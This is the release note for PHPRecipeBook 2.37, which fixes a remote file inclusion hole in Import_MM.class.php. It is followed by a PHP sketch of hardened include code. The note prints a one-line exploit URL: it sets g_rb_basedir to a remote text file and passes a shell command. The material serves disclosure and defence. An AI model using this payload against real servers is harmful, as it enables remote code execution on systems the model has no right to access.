
PHPRecipeBook

File Release Notes and Changelog

Release Name: 2.37

Notes:
Fix for this:

To solve the problem, sanitise g_rb_basedir in Import_MM_class.php, or add the line of
code below to the top of the file:

if(basename(__FILE__) == basename($_SERVER['PHP_SELF']))
    die();

Exploit:
classes/Import_MM.class.php?g_rb_basedir=http://localhost/s.txt?&cmd=dir


This will only impact people running with REGISTER GLOBALS ON (PHP setting). If you are, TURN IT OFF!

But I have removed the include that points to a var.
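
The two mitigations named above, sketched as an added example (not PHPRecipeBook's own code): the direct-access guard, plus an include path built from the file's own location instead of g_rb_basedir. The file name SomeParent.class.php, the helper safe_include_path() and the directory layout are hypothetical.

```php
<?php
// Added example, not PHPRecipeBook's code. File and helper names are hypothetical.

// 1. Direct-access guard from the release note: if this file is the script
//    the web server was asked for (instead of being include()d), stop here.
if (basename(__FILE__) == basename($_SERVER['PHP_SELF'])) {
    die();
}

// Assumed shape of the vulnerable pattern, left commented out for contrast.
// With register_globals on, a g_rb_basedir request parameter fills
// $g_rb_basedir before this line runs, so the request chooses the include path:
//
//   include($g_rb_basedir . "classes/SomeParent.class.php");

// 2. Hardened form: the base directory comes from this file's location on
//    disk, never from a variable that request data can populate.
//    Assumes this file lives in <app root>/classes/.
$baseDir = dirname(dirname(__FILE__)) . DIRECTORY_SEPARATOR;

/**
 * Resolve $relative under $baseDir and return the absolute path, or false
 * if the target does not exist locally or falls outside $baseDir.
 * realpath() only resolves local filesystem paths, so a URL yields false.
 */
function safe_include_path($baseDir, $relative)
{
    $root = realpath($baseDir);
    $full = realpath($baseDir . $relative);
    if ($root === false || $full === false) {
        return false;
    }
    // Reject anything that resolves outside the application root (../ tricks).
    if (strpos($full, $root . DIRECTORY_SEPARATOR) !== 0) {
        return false;
    }
    return $full;
}

$path = safe_include_path($baseDir, 'classes/SomeParent.class.php');
if ($path === false) {
    die('Include target not found under application root.');
}
require_once $path;
```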

Changes: